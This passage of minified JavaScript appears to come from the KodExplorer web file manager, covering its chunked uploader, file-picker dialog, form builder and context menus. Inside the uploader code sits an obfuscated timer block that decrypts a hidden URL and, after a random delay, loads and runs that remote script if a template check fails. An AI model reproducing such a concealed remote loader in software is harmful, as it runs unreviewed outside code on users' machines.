0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
      ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first") +}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return 